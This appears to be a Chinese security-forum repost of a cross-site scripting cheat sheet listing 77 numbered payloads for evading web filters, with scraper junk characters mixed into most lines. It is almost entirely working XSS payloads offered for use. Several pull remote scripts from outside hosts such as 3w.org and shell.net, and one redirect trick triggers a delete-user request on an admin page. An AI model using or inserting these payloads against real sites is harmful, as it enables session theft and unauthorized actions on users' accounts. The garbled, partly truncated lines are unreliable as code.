貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
. }. o0 {) N2 a: t/ B8 h
; z7 {2 j* M: t9 s (1)普通的XSS JavaScript注入# r% E% e: o. l. w" S: g+ w
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>( a* o5 _2 e5 n. g# z% c, }
4 C; |# p2 m4 [5 b
(2)IMG标签XSS使用JavaScript命令6 @# k, @3 `# b1 m! Y0 t
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>! o' u+ _. @/ M# [# b
9 W/ e3 f) }6 L# y/ N% C! m3 H
(3)IMG标签无分号无引号( n( Z5 f7 R: f7 N7 C
<IMG SRC=javascript:alert(‘XSS’)>7 R$ D4 `/ K8 c N$ Y
+ m! x+ @7 g. `! N (4)IMG标签大小写不敏感
# {5 {( K+ ?4 Q3 `) G' U- x <IMG SRC=JaVaScRiPt:alert(‘XSS’)>/ l4 {6 Z. V+ v
4 _2 L) z! |1 [) I
(5)HTML编码(必须有分号)6 ~4 q: u3 Y% i$ A; g% B
<IMG SRC=javascript:alert(“XSS”)>0 ]5 Y6 d) m( k
( o' B2 l8 A, n' M+ G: @6 m (6)修正缺陷IMG标签
5 z. L$ Q% M$ B4 B. R6 f4 \4 G <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>2 E7 p( S2 e7 G) T
' e1 A8 I! G0 }$ O! T& ]$ _
(7)formCharCode标签(计算器)
3 X1 k g" ]* X, e; h: v <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))># \. F, N0 F: ]6 z+ a6 U: t+ X: B
) g& q3 s2 X3 N: d" e* {5 b* q
(8)UTF-8的Unicode编码(计算器). m& N. s: M. n, Q: j+ p
<IMG SRC=jav..省略..S')>5 u; O, p3 B! W+ c6 \
* s2 m; v& L( l (9)7位的UTF-8的Unicode编码是没有分号的(计算器)
0 O2 y$ U+ m5 }8 _ g <IMG SRC=jav..省略..S')>& b" o' y9 s" E5 x0 c) E
* \ S1 G3 B1 M( {/ {& W2 y (10)十六进制编码也是没有分号(计算器)1 `% d/ e2 t$ @) r! e- e0 f+ G
<IMG SRC=java..省略..XSS')>2 ?7 b* A5 ^% _9 j' z3 b( \
+ r9 \( U5 b$ x (11)嵌入式标签,将Javascript分开
" L. s9 {( w0 n <IMG SRC=”jav ascript:alert(‘XSS’);”>. y$ r* s D( \' A+ Z
7 r2 u, L G& P3 }6 K: T (12)嵌入式编码标签,将Javascript分开$ s3 i$ ^6 T0 a6 V& B
<IMG SRC=”jav ascript:alert(‘XSS’);”>( {( k9 b. t- G8 d. D" {& {
* H8 V" ?7 Y7 C$ x' M (13)嵌入式换行符& Q/ ?, @2 ~* \! r d4 l# @
<IMG SRC=”jav ascript:alert(‘XSS’);”>) [# n2 i9 P7 {. g
3 b6 _( B. h/ _. x! ~$ w (14)嵌入式回车; S$ ^7 a2 c: Z G) @) D5 ~; N
<IMG SRC=”jav ascript:alert(‘XSS’);”>
, u! \4 E# B8 O) P7 c
' f4 C1 x7 Q& U! K! Z4 u (15)嵌入式多行注入JavaScript,这是XSS极端的例子! n2 w5 w9 [2 k
<IMG SRC=”javascript:alert(‘XSS‘)”>
3 ~7 ~+ R b& O! B* s$ a3 ~2 |8 y% O* c9 ~/ d% L; K
(16)解决限制字符(要求同页面)
& M6 D3 t8 W+ @8 R/ O# i <script>z=’document.’</script>
4 G. M5 {6 j B" I1 g/ } <script>z=z+’write(“‘</script>5 x! v; a J' g. Z+ B
<script>z=z+’<script’</script>& j( ~1 s; ]" e, b( U
<script>z=z+’ src=ht’</script>
9 Z, e2 C+ T4 B# A( S2 j- C <script>z=z+’tp://ww’</script>1 F* l9 B5 P) c" n. H& V! e' e
<script>z=z+’w.shell’</script>
/ |/ S* V% b+ {% z6 @ <script>z=z+’.net/1.’</script>5 V. L. P: l+ b. p, l$ Y; Y$ ~
<script>z=z+’js></sc’</script>
9 h; r' j) j& L# @ <script>z=z+’ript>”)’</script>
' [8 i. U) q$ b, j. [7 ^, x5 [& b <script>eval_r(z)</script>
2 C; X0 g" s. o
4 {& n- U$ Z. y4 R' O5 d7 J (17)空字符
) v* ^$ o9 _# ] perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
e' t! g. F6 a0 N( G" [$ ]& m# V: d0 [- I& R
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用5 C& U1 G& s3 V U
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
' a; q$ P$ ?1 t" R8 e8 `5 G& f Q, ?1 z) B3 Z" h& T6 Y: Q
(19)Spaces和meta前的IMG标签
v8 u# @4 H6 }1 T% v <IMG SRC=” javascript:alert(‘XSS’);”>; }3 R* m+ b1 T* P1 Z9 X
1 `/ [& U# i- z; \2 |( [
(20)Non-alpha-non-digit XSS
/ S }# l: W' |* V. ~7 h <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>3 i9 \" e- t( _% Q* g, _1 P
( c! q$ {( P+ ? (21)Non-alpha-non-digit XSS to 2( d G3 u/ P3 z" }3 L% l
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
7 l7 F: h) l+ d4 C& Z2 Y
( a/ ]' t8 x) H, M4 i (22)Non-alpha-non-digit XSS to 3
/ Y/ T7 x' f5 h0 U <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>, {5 b* G: S, Z1 ]5 S* ^6 I
# O/ i. b5 t$ T
(23)双开括号
( h, z" s/ b! p: q <<SCRIPT>alert(“XSS”);//<</SCRIPT>" m& b5 p8 v! Q, X4 V8 y% H
# D5 G5 l/ P4 E8 D' g8 p3 J (24)无结束脚本标记(仅火狐等浏览器)
/ I5 c- @5 y( E; ^! M <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>% W7 k) k$ {' T) f! H( L3 y( f6 n
4 H0 s% z* @ c, m, ]! J& y (25)无结束脚本标记28 p7 w+ G( Q& _: \0 u5 e/ U4 U& ^
<SCRIPT SRC=//3w.org/XSS/xss.js>
4 n" [6 c0 x1 i! b* [1 {
" L: k, y4 a0 u7 H$ w" E* R* \ (26)半开的HTML/JavaScript XSS& `+ l; [+ o( Z" i: z
<IMG SRC=”javascript:alert(‘XSS’)”
/ b: y1 ?6 T$ N8 [+ l1 N: _& i
9 a9 n; J; x! Z- d (27)双开角括号
& J, d3 J1 v- C. z o3 C& N <iframe src=http://3w.org/XSS.html <0 ~; q, P1 i J; ?* Z: m F
; ?2 Q! k, `" ]9 E6 |) |
(28)无单引号 双引号 分号3 Q4 i* q2 j0 V7 i7 m* Y
<SCRIPT>a=/XSS/
F4 v) U, |/ l alert(a.source)</SCRIPT>1 M4 ~# p5 { }7 ?% ~; o- T3 q- I
" s1 X3 j1 ^+ m! F, L (29)换码过滤的JavaScript
8 o! g: y+ |, a \”;alert(‘XSS’);//
/ D1 Y+ z4 D: Z2 t/ a1 d, y
L: \/ Z8 A7 K7 t& s6 n. [ (30)结束Title标签
( `6 d$ V- Z. Y, Y7 p </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
$ Q7 x2 c) q" ]1 o+ T# @/ ?9 [5 k+ x5 Y: w, A
(31)Input Image
8 _7 x7 j6 Z+ x* \ <INPUT SRC=”javascript:alert(‘XSS’);”>
7 I, K+ p7 u# h* i! P' i O3 P7 W8 g$ s
(32)BODY Image
) }; Y; R" x H, u7 B <BODY BACKGROUND=”javascript:alert(‘XSS’)”>8 t& Z, y# H; {
9 y7 [: y* f5 k( K6 r (33)BODY标签) }" }! e$ w1 d b( s4 Q
<BODY(‘XSS’)>
2 F! h0 a# e% O) J' S r8 v" o8 u3 g7 {% F% `6 ~6 N3 p
(34)IMG Dynsrc
9 w, N, L' H* d! q7 n, { <IMG DYNSRC=”javascript:alert(‘XSS’)”>
3 |; L3 N; z" l, X( d; P6 k: A, z7 q& g
(35)IMG Lowsrc# D8 |& b9 A& I/ u% K& }
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
9 A8 I. d" ?# o: q# {
, C* f$ g; ^) j9 M, h (36)BGSOUND
# o/ X4 i8 ~3 A <BGSOUND SRC=”javascript:alert(‘XSS’);”>
% R+ S/ a$ O2 O! N o5 j4 o
% Z' I6 W1 T; z- c& k0 y! T( k (37)STYLE sheet) o( O2 \7 i0 b3 h' E
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>$ P. J4 a S0 R
* |, `7 P8 n' o. c
(38)远程样式表$ j# j% \) G2 a
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
/ V$ v1 [6 q" O; ?7 X, x' k- S( p6 p6 ?$ I* l% ~1 Y
(39)List-style-image(列表式)9 z' X7 A+ h# U% N
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
" b( _: C, l3 I7 Z4 k
Y0 a( I# L9 \% M- e1 S- l (40)IMG VBscript' P4 [) Y1 f$ W$ e
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS) J+ I9 a- } ^! \, a. T# Y
* `( }' B' q0 o" z (41)META链接url
2 \1 t- ^% O" q& B <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
! T/ f+ O; h( o: z% `7 m# J% F: ^: `2 {# A, U* ^/ ?& `* [
(42)Iframe
& K+ U! R2 j" c6 P9 }( L <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>& s3 V$ [# y4 a0 z+ `
9 o2 i( B+ Z. {8 ^ (43)Frame* V' w/ V8 R& J7 k; ]' B
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
5 N. l2 p5 {0 w# P2 G7 S
" V4 z( ^. m, b) e* G7 A (44)Table
# n) {9 c6 l" M& u- L' K <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
4 U7 c- U/ f. s, N
3 Y9 f5 {, d$ g" } (45)TD1 C w B! ?) f- }; v) m$ R' L& S
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
; p) Z; F9 k! u( Y6 T+ I: a7 K9 n: q; X' f
. G- S% F! r+ R. f% `7 l1 X& w (46)DIV background-image
* K' T4 o9 W( _. F1 }: u <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>. n, M! d$ @5 G. y, E8 G9 P
- [2 \; ~# i' c$ E" d (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
: I+ d1 c S+ V: {# x <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
% L& z& v- ^& Z& i2 N, u3 Z) W P3 T% ^
(48)DIV expression6 A$ L0 v4 U" z* Z3 J5 F6 V/ G
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
# E3 i5 J! X- p8 d. O
8 ?' i+ S5 G& m* Q( O (49)STYLE属性分拆表达
1 ~8 }6 Z( Q' T, B, A" E <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
3 `+ K x& \5 v0 Z: l
4 b0 l1 d. t* ^6 C) ]# h (50)匿名STYLE(组成:开角号和一个字母开头)$ V `1 [6 j/ U8 n9 R$ G* K
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>2 f8 h# B7 d F: W V, c: g
. L5 S9 a( o) `0 F( m7 P (51)STYLE background-image
) w( K# E6 t, a <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>5 }5 E( T* h4 e6 u7 p6 K
4 @3 V4 T' _6 o' K$ ^% u( V) @
(52)IMG STYLE方式
* u$ w" i) j4 m4 q$ k! D exppression(alert(“XSS”))’>
1 E0 ^6 p; R- k# [1 g/ |* A
. C2 q: g" y; V3 L( M* r (53)STYLE background v3 O6 W$ Z3 M3 g4 a- t4 c' t
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
n d& ]; w* V6 U0 y6 P2 ? J. ^& ^( a. V! R2 _( R( y
(54)BASE/ w2 `4 P1 n2 Z
<BASE HREF=”javascript:alert(‘XSS’);//”>
7 K+ O1 Q8 }7 l! {- _6 d2 [ {2 ^3 r8 @ b; W' q& c! r% b
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS6 v. R4 x e+ e( S/ M8 X
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
% N2 {- @7 e" ]- @% @7 j3 o3 t6 \: T' [5 M
(56)在flash中使用ActionScrpt可以混进你XSS的代码
; R2 A; ~2 p$ q9 J5 v a=”get”;
" r5 a% T, P. d( m b=”URL(\”";
( @0 X; \# o- D# B* L: H c=”javascript:”;# k5 p2 z7 F. y# Z& P) y9 e. C
d=”alert(‘XSS’);\”)”; |& T% ^ r6 i5 d6 S
eval_r(a+b+c+d);
0 d2 ?; b. Y9 W& u" c/ t7 X ]& O* [+ r# j9 B `
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
% ^+ k% m9 j+ T5 w <HTML xmlns:xss>
' m r2 E. V- a# {! l t' C <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>- L1 X. G1 m4 E( m9 Y7 P! k
<xss:xss>XSS</xss:xss>
# ]& S" W5 O+ c! U0 P, J </HTML>! _* G8 f- U. P* I6 r, ]3 O
/ h+ h+ {+ x+ K6 P# R (58)如果过滤了你的JS你可以在图片里添加JS代码来利用, x h! W3 P; v) j+ N& c" e
<SCRIPT SRC=””></SCRIPT>7 Q% y" U- Z- m1 M" E1 @* Z
8 I5 S7 F7 W3 J5 r6 l9 M3 L$ z
(59)IMG嵌入式命令,可执行任意命令# o1 ]7 v' I% D0 [+ C) } [ g
<IMG SRC=”http://www.XXX.com/a.php?a=b”>! k0 t/ J( _: ]9 y
! A1 `) j! n' `; r0 V% P
(60)IMG嵌入式命令(a.jpg在同服务器)( _9 ~7 S+ P* T& g f1 W. ]
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser! p1 k: K3 C8 T
: X& o# V* b4 U4 i (61)绕符号过滤
0 X9 h; R( U: Q' v$ ^9 j <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>( }9 |$ l0 Q/ K" d
* a2 W# H7 X5 u& Q+ A: f9 i
(62)
% X) M2 c; Z f7 e8 [ <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
; h4 }2 l' t& s( m/ H
$ ?4 e# s. }) l6 Y (63)
$ i8 s, v/ ]& ~9 I! F$ c* @ <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>6 Q/ {5 p2 I# Y/ b- a, x
& K& n1 R/ s' _, w6 p$ ~- |
(64)0 X3 @& ~' U+ t8 N0 a6 B9 H- i
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>! b- {1 w! ^" R& Y( S0 N; M6 l4 y
2 }* I8 z# ?2 {# h1 P (65)
3 Z) s1 [( c1 k; N) N7 G <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>$ N0 ?' b U8 I. t
1 c, v+ O. R- N% y Q (66)' C. n. B# T$ k J# K* x
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>5 a6 C, f1 v$ \
8 j+ [$ _* j& \* |- c1 Y: {, d' i
(67)
, p- G& Y) K4 `. N8 ?& E! Y$ d* H <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>( D* {( U6 L2 I* M
4 F4 A0 X! e2 ^3 Q3 U3 R (68)URL绕行
1 r, f" t4 T, [* `0 j5 E <A HREF=”http://127.0.0.1/”>XSS</A>7 K9 E1 J$ K. x/ p, A% `. w
6 r) `- f) k- U" e; {- X
(69)URL编码
, v- |# o( H# X1 z5 N/ F <A HREF=”http://3w.org”>XSS</A>
7 z% o# j! L( Q/ {: E( r" L: B7 E/ T& |
(70)IP十进制6 J! p3 _4 Q% c/ R7 S4 v% m7 ~% e
<A HREF=”http://3232235521″>XSS</A>
/ }* a1 b# d1 j4 S9 z" i; z! o5 s
/ _) P/ s; e% a# F) T/ B7 R (71)IP十六进制! D# J: C! ]# c& v
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
% ?0 r& u# ]+ n) S9 x7 i/ R* h0 T. J1 h: Q+ N
(72)IP八进制- `" ?5 ^5 w7 H
<A HREF=”http://0300.0250.0000.0001″>XSS</A>* }( B, `% C: R; b' p |# H& h
$ }( B' V6 G2 J
(73)混合编码
: s! ~, K! `& V9 \5 i" h) [) I& M <A HREF=”h
4 G+ J: u P3 ^- n) n Z& d4 c1 H0 g tt p://6 6.000146.0×7.147/”">XSS</A>% n* ~3 @: C( C; W+ ~% w+ T
7 [. n2 j6 f! c
(74)节省[http:]: A S7 D' d6 z; y1 E
<A HREF=”//www.google.com/”>XSS</A>
$ z5 J) k) I$ C
0 x5 f* I. q3 i; i8 i (75)节省[www]
1 z3 D' d2 X0 A9 D8 V <A HREF=”http://google.com/”>XSS</A>2 `5 ^$ O9 p8 U! \7 ?
$ q8 Q9 V) C# K
(76)绝对点绝对DNS4 K X5 @* w6 c6 F: r
<A HREF=”http://www.google.com./”>XSS</A># |- [! h- G V( y1 b
& i3 x: ~* V/ @# x- \7 ~* Z8 a
(77)javascript链接2 Z6 Z; J: ]7 Q$ p: X3 F0 s2 c
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |